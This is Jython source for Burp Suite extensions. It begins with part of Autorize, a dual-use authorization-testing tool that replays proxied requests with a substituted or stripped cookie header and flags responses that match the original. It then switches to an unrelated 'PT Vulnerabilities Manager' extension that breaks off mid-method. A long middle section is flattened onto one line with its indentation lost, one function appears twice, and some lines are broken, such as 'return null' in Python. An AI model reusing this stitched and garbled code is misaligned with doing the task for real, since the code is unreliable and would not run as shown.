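        self.filtersPnl.setBounds(0, 0, 1000, 1000)
        self.filtersPnl.add(IFLType)
        self.filtersPnl.add(self.IFType)
        self.filtersPnl.add(IFLContent)
        self.filtersPnl.add(self.IFText)
        self.filtersPnl.add(self.IFAdd)
        self.filtersPnl.add(self.IFDel)
        self.filtersPnl.add(IFLabelList)
        self.filtersPnl.add(self.IFList)

    def initConfigurationTab(self):
        """Build the configuration panel and attach the filter tabs to it."""
        #
        ## init configuration tab
        #
        self.prevent304 = JCheckBox("Prevent 304 Not Modified status code")
        self.prevent304.setBounds(290, 25, 300, 30)

        self.ignore304 = JCheckBox("Ignore 304/204 status code responses")
        self.ignore304.setBounds(290, 5, 300, 30)
        self.ignore304.setSelected(True)

        self.autoScroll = JCheckBox("Auto Scroll")
        self.autoScroll.setBounds(160, 40, 140, 30)

        self.doUnauthorizedRequest = JCheckBox("Check unauthenticated")
        self.doUnauthorizedRequest.setBounds(290, 45, 300, 30)
        self.doUnauthorizedRequest.setSelected(True)

        startLabel = JLabel("Authorization checks:")
        startLabel.setBounds(10, 10, 140, 30)

        self.startButton = JButton("Autorize is off",actionPerformed=self.startOrStop)
        self.startButton.setBounds(160, 10, 120, 30)
        self.startButton.setBackground(Color(255, 100, 91, 255))

        self.clearButton = JButton("Clear List",actionPerformed=self.clearList)
        self.clearButton.setBounds(10, 40, 100, 30)

        # Text of the header that is swapped into each replayed request.
        self.replaceString = JTextArea("Cookie: Insert=injected; header=here;", 5, 30)
        self.replaceString.setWrapStyleWord(True)
        self.replaceString.setLineWrap(True)
        self.replaceString.setBounds(10, 80, 470, 180)

        self.filtersTabs = JTabbedPane()
        self.filtersTabs.addTab("Enforcement Detector", self.EDPnl)
        self.filtersTabs.addTab("Detector Unauthenticated", self.EDPnlUnauth)
        self.filtersTabs.addTab("Interception Filters", self.filtersPnl)
        self.filtersTabs.addTab("Export", self.exportPnl)
        self.filtersTabs.setBounds(0, 280, 2000, 700)

        self.pnl = JPanel()
        self.pnl.setBounds(0, 0, 1000, 1000)
        self.pnl.setLayout(None)
        self.pnl.add(self.startButton)
        self.pnl.add(self.clearButton)
        self.pnl.add(self.replaceString)
        self.pnl.add(startLabel)
        self.pnl.add(self.autoScroll)
        self.pnl.add(self.ignore304)
        self.pnl.add(self.prevent304)
        self.pnl.add(self.doUnauthorizedRequest)
        self.pnl.add(self.filtersTabs)

    def initTabs(self):
        """Build the log table, its popup menu and the message viewer tabs."""
        #
        ## init autorize tabs
        #
        self.logTable = Table(self)
        self.logTable.setAutoCreateRowSorter(True)

        tableWidth = self.logTable.getPreferredSize().width
        self.logTable.getColumn("ID").setPreferredWidth(Math.round(tableWidth / 50 * 2))
        self.logTable.getColumn("URL").setPreferredWidth(Math.round(tableWidth / 50 * 24))
        self.logTable.getColumn("Orig. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
        self.logTable.getColumn("Modif. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
        self.logTable.getColumn("Unauth. Length").setPreferredWidth(Math.round(tableWidth / 50 * 4))
        self.logTable.getColumn("Authorization Enforcement Status").setPreferredWidth(Math.round(tableWidth / 50 * 4))
        self.logTable.getColumn("Authorization Unauth. Status").setPreferredWidth(Math.round(tableWidth / 50 * 4))

        self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
        self._splitpane.setResizeWeight(1)
        self.scrollPane = JScrollPane(self.logTable)
        self._splitpane.setLeftComponent(self.scrollPane)
        self.scrollPane.getVerticalScrollBar().addAdjustmentListener(autoScrollListener(self))

        # One check-box menu entry per enforcement status, used to filter the table.
        self.menuES0 = JCheckBoxMenuItem(self._enfocementStatuses[0],True)
        self.menuES1 = JCheckBoxMenuItem(self._enfocementStatuses[1],True)
        self.menuES2 = JCheckBoxMenuItem(self._enfocementStatuses[2],True)
        self.menuES0.addItemListener(menuTableFilter(self))
        self.menuES1.addItemListener(menuTableFilter(self))
        self.menuES2.addItemListener(menuTableFilter(self))

        copyURLitem = JMenuItem("Copy URL")
        copyURLitem.addActionListener(copySelectedURL(self))

        self.menu = JPopupMenu("Popup")
        self.menu.add(copyURLitem)
        self.menu.add(self.menuES0)
        self.menu.add(self.menuES1)
        self.menu.add(self.menuES2)

        self.tabs = JTabbedPane()
        self._requestViewer = self._callbacks.createMessageEditor(self, False)
        self._responseViewer = self._callbacks.createMessageEditor(self, False)
        self._originalrequestViewer = self._callbacks.createMessageEditor(self, False)
        self._originalresponseViewer = self._callbacks.createMessageEditor(self, False)
        self._unauthorizedrequestViewer = self._callbacks.createMessageEditor(self, False)
        self._unauthorizedresponseViewer = self._callbacks.createMessageEditor(self, False)

        self.tabs.addTab("Modified Request", self._requestViewer.getComponent())
        self.tabs.addTab("Modified Response", self._responseViewer.getComponent())
        self.tabs.addTab("Original Request", self._originalrequestViewer.getComponent())
        self.tabs.addTab("Original Response", self._originalresponseViewer.getComponent())
        self.tabs.addTab("Unauthenticated Request", self._unauthorizedrequestViewer.getComponent())
        self.tabs.addTab("Unauthenticated Response", self._unauthorizedresponseViewer.getComponent())
        self.tabs.addTab("Configuration", self.pnl)
        # Index 6 is the "Configuration" tab added last above.
        self.tabs.setSelectedIndex(6)
        self._splitpane.setRightComponent(self.tabs)

    def initCallbacks(self):
        """Apply Burp's UI styling and register the context menu and tab."""
        #
        ## init callbacks
        #

        # customize our UI components
        self._callbacks.customizeUiComponent(self._splitpane)
        self._callbacks.customizeUiComponent(self.logTable)
        self._callbacks.customizeUiComponent(self.scrollPane)
        self._callbacks.customizeUiComponent(self.tabs)
        self._callbacks.customizeUiComponent(self.filtersTabs)
        self._callbacks.registerContextMenuFactory(self)
        # add the custom tab to Burp's UI
        self._callbacks.addSuiteTab(self)

    #
    ## Events functions
    #
    def startOrStop(self, event):
        """Toggle interception; the button caption doubles as the state flag."""
        if self.startButton.getText() == "Autorize is off":
            self.startButton.setText("Autorize is on")
            self.startButton.setBackground(Color.GREEN)
            self.intercept = 1
            self._callbacks.registerHttpListener(self)
        else:
            self.startButton.setText("Autorize is off")
            self.startButton.setBackground(Color(255, 100, 91, 255))
            self.intercept = 0
            self._callbacks.removeHttpListener(self)

    def addEDFilter(self, event):
        """Append "<type>: <text>" to the enforcement-detector filter list."""
        typeName = self.EDType.getSelectedItem().split(":")[0]
        self.EDModel.addElement(typeName + ": " + self.EDText.getText())

    def delEDFilter(self, event):
        """Remove the selected enforcement-detector filter, if any."""
        index = self.EDList.getSelectedIndex()
        if index != -1:
            self.EDModel.remove(index)

    def addEDFilterUnauth(self, event):
        """Append "<type>: <text>" to the unauthenticated detector list."""
        typeName = self.EDTypeUnauth.getSelectedItem().split(":")[0]
        self.EDModelUnauth.addElement(typeName + ": " + self.EDTextUnauth.getText())

    def delEDFilterUnauth(self, event):
        """Remove the selected unauthenticated detector filter, if any."""
        index = self.EDListUnauth.getSelectedIndex()
        if index != -1:
            self.EDModelUnauth.remove(index)

    def addIFFilter(self, event):
        """Append "<type>: <text>" to the interception filter list."""
        typeName = self.IFType.getSelectedItem().split(":")[0]
        self.IFModel.addElement(typeName + ": " + self.IFText.getText())

    def delIFFilter(self, event):
        """Remove the selected interception filter, if any."""
        index = self.IFList.getSelectedIndex()
        if index != -1:
            self.IFModel.remove(index)

    def clearList(self, event):
        """Empty the log and tell the table which rows disappeared."""
        self._lock.acquire()
        try:
            oldSize = self._log.size()
            self._log.clear()
            # An empty log has no row range to report; (0, -1) is not a valid
            # interval for the table and its row sorter.
            if oldSize > 0:
                self.fireTableRowsDeleted(0, oldSize - 1)
        finally:
            # Always release: a lock left held would block later log updates.
            self._lock.release()

    def export(self, event):
        """Run the exporter that matches the selected file type."""
        if self.exportType.getSelectedItem() == "HTML":
            self.exportToHTML()
        else:
            self.exportToCSV()

    def _responseLength(self, requestResponse):
        """Return the length of the stored response, or 0 when there is no item."""
        if requestResponse is None:
            return 0
        return len(requestResponse.getResponse())

    def _entriesForExport(self, enforcementStatusFilter):
        """Return the log entries whose status matches the export filter.

        "All Statuses" selects every entry; any other value must equal the
        entry's enforcement status or its unauthenticated status.
        """
        selected = []
        for i in range(0, self._log.size()):
            entry = self._log.get(i)
            if (enforcementStatusFilter == "All Statuses"
                    or enforcementStatusFilter == entry._enfocementStatus
                    or enforcementStatusFilter == entry._enfocementStatusUnauthorized):
                selected.append(entry)
        return selected

    def _escapeHtml(self, value):
        """Format ``value`` with %s and HTML-encode it for text or a quoted attribute."""
        text = "%s" % (value,)
        for raw, encoded in (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"),
                             ("\"", "&quot;"), ("'", "&#39;")):
            text = text.replace(raw, encoded)
        return text

    def exportToCSV(self):
        """Ask for a destination file and write the log as tab-separated text."""
        parentFrame = JFrame()
        fileChooser = JFileChooser()
        fileChooser.setSelectedFile(File("AutorizeReprort.csv"))
        fileChooser.setDialogTitle("Save Autorize Report")
        userSelection = fileChooser.showSaveDialog(parentFrame)
        if userSelection != JFileChooser.APPROVE_OPTION:
            return

        fileToSave = fileChooser.getSelectedFile()
        enforcementStatusFilter = self.exportES.getSelectedItem()
        csvContent = "id\tURL\tOriginal length\tModified length\tUnauthorized length\tAuthorization Enforcement Status\tAuthorization Unauthenticated Status\n"

        for entry in self._entriesForExport(enforcementStatusFilter):
            csvContent += "%d\t%s\t%d\t%d\t%d\t%s\t%s\n" % (
                entry._id,
                entry._url,
                self._responseLength(entry._originalrequestResponse),
                self._responseLength(entry._requestResponse),
                self._responseLength(entry._unauthorizedRequestResponse),
                entry._enfocementStatus,
                entry._enfocementStatusUnauthorized)

        f = open(fileToSave.getAbsolutePath(), 'w')
        try:
            f.write(csvContent)
        finally:
            # Close the handle even when the write fails.
            f.close()

    def exportToHTML(self):
        """Ask for a destination file and write the log as an HTML report.

        URL and status values are HTML-encoded before they are inserted,
        because logged URLs come from proxied traffic.
        """
        parentFrame = JFrame()
        fileChooser = JFileChooser()
        fileChooser.setSelectedFile(File("AutorizeReprort.html"))
        fileChooser.setDialogTitle("Save Autorize Report")
        userSelection = fileChooser.showSaveDialog(parentFrame)
        if userSelection != JFileChooser.APPROVE_OPTION:
            return

        fileToSave = fileChooser.getSelectedFile()
        enforcementStatusFilter = self.exportES.getSelectedItem()
        htmlContent = """<html><title>Autorize Report by Barak Tawily</title> <style> .datagrid table { border-collapse: collapse; text-align: left; width: 100%; } .datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .datagrid table td, .datagrid table th { padding: 3px 10px; } .datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; } table { width: 100%; table-layout: fixed; } td { border: 1px solid #35f; overflow: hidden; text-overflow: ellipsis; } td.a { width: 13%; white-space: nowrap; } td.b { width: 9%; word-wrap: break-word; } </style> <body> <h1>Autorize Report<h1> <div class="datagrid"><table> <thead><tr><th width=\"3%\">ID</th><th width=\"48%\">URL</th><th width=\"9%\">Original length</th><th width=\"9%\">Modified length</th><th width=\"9%\">Unauthorized length</th><th width=\"11%\">Authorization Enforcement Status</th><th width=\"11%\">Authorization Unauthenticated Status</th></tr></thead> <tbody>"""

        # Cell colour per status; a status outside this table gets no colour.
        statusColors = {
            self._enfocementStatuses[0]: "red",
            self._enfocementStatuses[1]: "yellow",
            self._enfocementStatuses[2]: "LawnGreen",
        }

        for entry in self._entriesForExport(enforcementStatusFilter):
            url = self._escapeHtml(entry._url)
            htmlContent += "<tr><td>%d</td><td><a href=\"%s\">%s</a></td><td>%d</td><td>%d</td><td>%d</td><td bgcolor=\"%s\">%s</td><td bgcolor=\"%s\">%s</td></tr>" % (
                entry._id,
                url,
                url,
                self._responseLength(entry._originalrequestResponse),
                self._responseLength(entry._requestResponse),
                self._responseLength(entry._unauthorizedRequestResponse),
                statusColors.get(entry._enfocementStatus, ""),
                self._escapeHtml(entry._enfocementStatus),
                statusColors.get(entry._enfocementStatusUnauthorized, ""),
                self._escapeHtml(entry._enfocementStatusUnauthorized))

        htmlContent += "</tbody></table></div></body></html>"

        f = open(fileToSave.getAbsolutePath(), 'w')
        try:
            f.write(htmlContent)
        finally:
            # Close the handle even when the write fails.
            f.close()

    #
    # implement IContextMenuFactory
    #
    # (the method below continues past the end of this excerpt and is left as found)
    def createMenuItems(self, invocation):
        responses = invocation.getSelectedMessages();
        if responses > 0:
            ret = LinkedList()
            requestMenuItem = JMenuItem("Send request to Autorize");
            cookieMenuItem = JMenuItem("Send cookie to Autorize");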
requestMenuItem.addActionListener(handleMenuItems(self,responses[0], "request")) cookieMenuItem.addActionListener(handleMenuItems(self, responses[0], "cookie")) ret.add(requestMenuItem); ret.add(cookieMenuItem); return(ret); return null; # # implement ITab # def getTabCaption(self): return "Autorize" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 7 def getColumnName(self, columnIndex): if columnIndex == 0: return "ID" if columnIndex == 1: return "URL" if columnIndex == 2: return "Orig. Length" if columnIndex == 3: return "Modif. Length" if columnIndex == 4: return "Unauth. Length" if columnIndex == 5: return "Authorization Enforcement Status" if columnIndex == 6: return "Authorization Unauth. Status" return "" def getColumnClass(self, columnIndex): if columnIndex == 0: return Integer if columnIndex == 1: return String if columnIndex == 2: return Integer if columnIndex == 3: return Integer if columnIndex == 4: return Integer if columnIndex == 5: return String if columnIndex == 6: return String return String def getValueAt(self, rowIndex, columnIndex): logEntry = self._log.get(rowIndex) if columnIndex == 0: return logEntry._id if columnIndex == 1: return logEntry._url.toString() if columnIndex == 2: return len(logEntry._originalrequestResponse.getResponse()) if columnIndex == 3: return len(logEntry._requestResponse.getResponse()) if columnIndex == 4: if logEntry._unauthorizedRequestResponse != None: return len(logEntry._unauthorizedRequestResponse.getResponse()) else: #return "-" return 0 if columnIndex == 5: return logEntry._enfocementStatus if columnIndex == 6: return logEntry._enfocementStatusUnauthorized return "" # # implement IMessageEditorController # this allows our request/response viewers to obtain details about the messages being displayed # def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def 
getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): #if (self.intercept == 1) and (toolFlag != self._callbacks.TOOL_EXTENDER): if (self.intercept == 1) and (toolFlag == self._callbacks.TOOL_PROXY): if self.prevent304.isSelected(): if messageIsRequest: requestHeaders = list(self._helpers.analyzeRequest(messageInfo).getHeaders()) newHeaders = list() found = 0 for header in requestHeaders: if not "If-None-Match:" in header and not "If-Modified-Since:" in header: newHeaders.append(header) found = 1 if found == 1: requestInfo = self._helpers.analyzeRequest(messageInfo) bodyBytes = messageInfo.getRequest()[requestInfo.getBodyOffset():] bodyStr = self._helpers.bytesToString(bodyBytes) messageInfo.setRequest(self._helpers.buildHttpMessage(newHeaders, bodyStr)) if not messageIsRequest: if not self.replaceString.getText() in self._helpers.analyzeRequest(messageInfo).getHeaders(): if self.ignore304.isSelected(): firstHeader = self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders()[0] if "304" in firstHeader or "204" in firstHeader: return if self.IFList.getModel().getSize() == 0: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) else: urlString = str(self._helpers.analyzeRequest(messageInfo).getUrl()) do_the_check = 1 for i in range(0,self.IFList.getModel().getSize()): if self.IFList.getModel().getElementAt(i).split(":")[0] == "Scope items only": currentURL = URL(urlString) if not self._callbacks.isInScope(currentURL): do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains (simple string)": if self.IFList.getModel().getElementAt(i)[30:] not in urlString: do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Contains 
(regex)": regex_string = self.IFList.getModel().getElementAt(i)[22:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(urlString): do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (simple string)": if self.IFList.getModel().getElementAt(i)[34:] in urlString: do_the_check = 0 if self.IFList.getModel().getElementAt(i).split(":")[0] == "URL Not Contains (regex)": regex_string = self.IFList.getModel().getElementAt(i)[26:] p = re.compile(regex_string, re.IGNORECASE) if p.search(urlString): do_the_check = 0 if do_the_check: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) return def sendRequestToAutorizeWork(self,messageInfo): if messageInfo.getResponse() == None: message = self.makeMessage(messageInfo,False,False) requestResponse = self.makeRequest(messageInfo, message) self.checkAuthorization(requestResponse,self._helpers.analyzeResponse(requestResponse.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) else: self.checkAuthorization(messageInfo,self._helpers.analyzeResponse(messageInfo.getResponse()).getHeaders(),self.doUnauthorizedRequest.isSelected()) def makeRequest(self, messageInfo, message): requestURL = self._helpers.analyzeRequest(messageInfo).getUrl() return self._callbacks.makeHttpRequest(self._helpers.buildHttpService(str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message) def makeMessage(self, messageInfo, removeOrNot, authorizeOrNot): requestInfo = self._helpers.analyzeRequest(messageInfo) headers = requestInfo.getHeaders() if removeOrNot: headers = list(headers) removeHeaders = ArrayList() removeHeaders.add(self.replaceString.getText()[0:self.replaceString.getText().index(":")]) for header in headers[:]: for removeHeader in removeHeaders: if removeHeader in header: headers.remove(header) if authorizeOrNot: 
headers.append(self.replaceString.getText()) msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] return self._helpers.buildHttpMessage(headers, msgBody) def checkBypass(self,oldStatusCode,newStatusCode,oldContentLen,newContentLen,filters,requestResponse): analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse()) impression = "" if oldStatusCode == newStatusCode: if oldContentLen == newContentLen: impression = self._enfocementStatuses[0] else: auth_enforced = 1 for filter in filters: if str(filter).startswith("Headers (simple string): "): if not(filter[25:] in self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])): auth_enforced = 0 if str(filter).startswith("Headers (regex): "): regex_string = filter[17:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[0:analyzedResponse.getBodyOffset()])): auth_enforced = 0 if str(filter).startswith("Body (simple string): "): if not(filter[22:] in self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])): auth_enforced = 0 if str(filter).startswith("Body (regex): "): regex_string = filter[14:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse()[analyzedResponse.getBodyOffset():])): auth_enforced = 0 if str(filter).startswith("Full request (simple string): "): if not(filter[30:] in self._helpers.bytesToString(requestResponse.getResponse())): auth_enforced = 0 if str(filter).startswith("Full request (regex): "): regex_string = filter[22:] p = re.compile(regex_string, re.IGNORECASE) if not p.search(self._helpers.bytesToString(requestResponse.getResponse())): auth_enforced = 0 if str(filter).startswith("Content-Length: "): if newContentLen != filter: auth_enforced = 0 if auth_enforced: impression = self._enfocementStatuses[2] else: impression = self._enfocementStatuses[1] else: impression = 
self._enfocementStatuses[2] return impression def checkAuthorization(self, messageInfo, originalHeaders, checkUnauthorized): message = self.makeMessage(messageInfo,True,True) requestResponse = self.makeRequest(messageInfo, message) analyzedResponse = self._helpers.analyzeResponse(requestResponse.getResponse()) oldStatusCode = originalHeaders[0] newStatusCode = analyzedResponse.getHeaders()[0] oldContentLen = self.getContentLength(originalHeaders) newContentLen = self.getContentLength(analyzedResponse.getHeaders()) # Check unauthorized request if checkUnauthorized: messageUnauthorized = self.makeMessage(messageInfo,True,False) requestResponseUnauthorized = self.makeRequest(messageInfo, messageUnauthorized) analyzedResponseUnauthorized = self._helpers.analyzeResponse(requestResponseUnauthorized.getResponse()) statusCodeUnauthorized = analyzedResponseUnauthorized.getHeaders()[0] contentLenUnauthorized = self.getContentLength(analyzedResponseUnauthorized.getHeaders()) EDFilters = self.EDModel.toArray() impression = self.checkBypass(oldStatusCode,newStatusCode,oldContentLen,newContentLen,EDFilters,requestResponse) if checkUnauthorized: EDFiltersUnauth = self.EDModelUnauth.toArray() impressionUnauthorized = self.checkBypass(oldStatusCode,statusCodeUnauthorized,oldContentLen,contentLenUnauthorized,EDFiltersUnauth,requestResponseUnauthorized) self._lock.acquire() row = self._log.size() if checkUnauthorized: self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,self._callbacks.saveBuffersToTempFiles(requestResponseUnauthorized),impressionUnauthorized)) # same requests not include again. else: self._log.add(LogEntry(self.currentRequestNumber,self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(),messageInfo,impression,None,"Disabled")) # same requests not include again. 
self.fireTableRowsInserted(row, row) self.currentRequestNumber = self.currentRequestNumber + 1 self._lock.release() def getContentLength(self, analyzedResponseHeaders): for header in analyzedResponseHeaders: if "Content-Length:" in header: return header; return "null" def getCookieFromMessage(self, messageInfo): headers = list(self._helpers.analyzeRequest(messageInfo.getRequest()).getHeaders()) for header in headers: if "Cookie:" in header: return header return None
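def initVulnerabilityTab(self):
    """Build the vulnerability panel (``self.pnl``) and its widgets.

    Creates the name field, threat-level and colour combo boxes, the
    description and mitigation text areas, the screenshot list with its
    preview label, and the Add / Remove buttons, all placed with absolute
    bounds on a panel that has no layout manager.
    """
    nameLabel = JLabel("Vulnerability Name:")
    nameLabel.setBounds(10, 10, 140, 30)

    self.addButton = JButton("Add", actionPerformed=self.addVuln)
    self.addButton.setBounds(10, 500, 100, 30)

    rmVulnButton = JButton("Remove", actionPerformed=self.rmVuln)
    rmVulnButton.setBounds(465, 500, 100, 30)

    mitigationLabel = JLabel("Mitigation:")
    mitigationLabel.setBounds(10, 290, 150, 30)

    addSSBtn = JButton("Add SS", actionPerformed=self.addSS)
    addSSBtn.setBounds(750, 40, 110, 30)

    deleteSSBtn = JButton("Remove SS", actionPerformed=self.removeSS)
    deleteSSBtn.setBounds(750, 75, 110, 30)

    piclistLabel = JLabel("Images list:")
    piclistLabel.setBounds(580, 10, 140, 30)

    # Screenshot list, backed by a model other handlers can update.
    self.screenshotsList = DefaultListModel()
    self.ssList = JList(self.screenshotsList)
    self.ssList.setBounds(580, 40, 150, 250)
    self.ssList.addListSelectionListener(ssChangedHandler(self))
    self.ssList.setBorder(BorderFactory.createLineBorder(Color.GRAY))

    previewPicLabel = JLabel("Selected image preview: (click to open in image viewer)")
    previewPicLabel.setBounds(580, 290, 500, 30)

    # Popup menu with a single "Copy" entry for the preview image.
    copyImgMenu = JMenuItem("Copy")
    copyImgMenu.addActionListener(copyImg(self))
    self.imgMenu = JPopupMenu("Popup")
    self.imgMenu.add(copyImgMenu)

    self.firstPic = JLabel()
    self.firstPic.setBorder(BorderFactory.createLineBorder(Color.GRAY))
    self.firstPic.setBounds(580, 320, 550, 400)
    self.firstPic.addMouseListener(imageClicked(self))

    self.vulnName = JTextField("")
    self.vulnName.getDocument().addDocumentListener(vulnTextChanged(self))
    self.vulnName.setBounds(140, 10, 422, 30)

    severities = ["Unclassified", "Critical", "High", "Medium", "Low"]
    self.threatLevel = JComboBox(severities)
    self.threatLevel.setBounds(140, 45, 140, 30)

    colors = ["Color:", "Green", "Red"]
    self.colorCombo = JComboBox(colors)
    self.colorCombo.setBounds(465, 45, 100, 30)

    severityLabel = JLabel("Threat Level:")
    severityLabel.setBounds(10, 45, 100, 30)

    descriptionLabel = JLabel("Description:")
    descriptionLabel.setBounds(10, 80, 100, 30)

    self.descriptionString = JTextArea("", 5, 30)
    self.descriptionString.setWrapStyleWord(True)
    self.descriptionString.setLineWrap(True)
    self.descriptionString.setBounds(10, 110, 555, 175)
    descriptionStringScroll = JScrollPane(self.descriptionString)
    descriptionStringScroll.setBounds(10, 110, 555, 175)
    descriptionStringScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

    self.mitigationStr = JTextArea("", 5, 30)
    self.mitigationStr.setWrapStyleWord(True)
    self.mitigationStr.setLineWrap(True)
    self.mitigationStr.setBounds(10, 320, 555, 175)
    mitigationStrScroll = JScrollPane(self.mitigationStr)
    mitigationStrScroll.setBounds(10, 320, 555, 175)
    mitigationStrScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

    self.pnl = JPanel()
    self.pnl.setBounds(0, 0, 1000, 1000)
    self.pnl.setLayout(None)
    # Components are added in the same order as before.
    for component in (addSSBtn, piclistLabel, nameLabel, deleteSSBtn, rmVulnButton,
                      severityLabel, mitigationLabel, descriptionLabel, previewPicLabel,
                      mitigationStrScroll, descriptionStringScroll, self.ssList,
                      self.firstPic, self.addButton, self.vulnName, self.threatLevel,
                      self.colorCombo):
        self.pnl.add(component)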
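class BurpExtender(IBurpExtender, ITab, IMessageEditorController, AbstractTableModel, IContextMenuFactory):
    """Burp extension that keeps per-project vulnerability notes and builds reports.

    NOTE(review): indentation of this listing was lost, so block nesting is
    reconstructed from the statements; the class continues past this excerpt.
    """

    def registerExtenderCallbacks(self, callbacks):
        """Entry point called by Burp: store the callbacks, load the config and build the UI."""
        # keep a reference to our callbacks object
        self._callbacks = callbacks
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()
        # set our extension name
        callbacks.setExtensionName("PT Vulnerabilities Manager")

        # config.ini is read from and written to the current working directory.
        self.config = SafeConfigParser()
        self.createSection('projects')
        self.createSection('general')
        self.config.read('config.ini')

        self.chooser = JFileChooser()
        # create the log and a lock on which to synchronize when adding log entries
        self._log = ArrayList()
        self._lock = Lock()

        self.logTable = Table(self)
        self.logTable.getColumnModel().getColumn(0).setMaxWidth(35)
        self.logTable.getColumnModel().getColumn(1).setMinWidth(100)

        self._requestViewer = self._callbacks.createMessageEditor(self, False)
        self._responseViewer = self._callbacks.createMessageEditor(self, False)

        self.initVulnerabilityTab()
        self.initProjSettingsTab()
        self.initTabs()
        self.initCallbacks()

        if self.projPath.getText() != None:
            self.loadVulnerabilities(self.projPath.getText())

        print "Thank you for installing PT Vulnerabilities Manager v1.0 extension"
        print "by Barak Tawily\n\n\n"
        print "Disclaimer:\nThis extension might create folders and files in your hardisk which might be declared as sensitive information, make sure you are creating projects under encrypted partition"
        return

    def initVulnerabilityTab(self):
        """Build the vulnerability panel (``self.pnl``) and its widgets."""
        nameLabel = JLabel("Vulnerability Name:")
        nameLabel.setBounds(10, 10, 140, 30)

        self.addButton = JButton("Add", actionPerformed=self.addVuln)
        self.addButton.setBounds(10, 500, 100, 30)

        rmVulnButton = JButton("Remove", actionPerformed=self.rmVuln)
        rmVulnButton.setBounds(465, 500, 100, 30)

        mitigationLabel = JLabel("Mitigation:")
        mitigationLabel.setBounds(10, 290, 150, 30)

        addSSBtn = JButton("Add SS", actionPerformed=self.addSS)
        addSSBtn.setBounds(750, 40, 110, 30)

        deleteSSBtn = JButton("Remove SS", actionPerformed=self.removeSS)
        deleteSSBtn.setBounds(750, 75, 110, 30)

        piclistLabel = JLabel("Images list:")
        piclistLabel.setBounds(580, 10, 140, 30)

        self.screenshotsList = DefaultListModel()
        self.ssList = JList(self.screenshotsList)
        self.ssList.setBounds(580, 40, 150, 250)
        self.ssList.addListSelectionListener(ssChangedHandler(self))
        self.ssList.setBorder(BorderFactory.createLineBorder(Color.GRAY))

        previewPicLabel = JLabel("Selected image preview: (click to open in image viewer)")
        previewPicLabel.setBounds(580, 290, 500, 30)

        copyImgMenu = JMenuItem("Copy")
        copyImgMenu.addActionListener(copyImg(self))
        self.imgMenu = JPopupMenu("Popup")
        self.imgMenu.add(copyImgMenu)

        self.firstPic = JLabel()
        self.firstPic.setBorder(BorderFactory.createLineBorder(Color.GRAY))
        self.firstPic.setBounds(580, 320, 550, 400)
        self.firstPic.addMouseListener(imageClicked(self))

        self.vulnName = JTextField("")
        self.vulnName.getDocument().addDocumentListener(vulnTextChanged(self))
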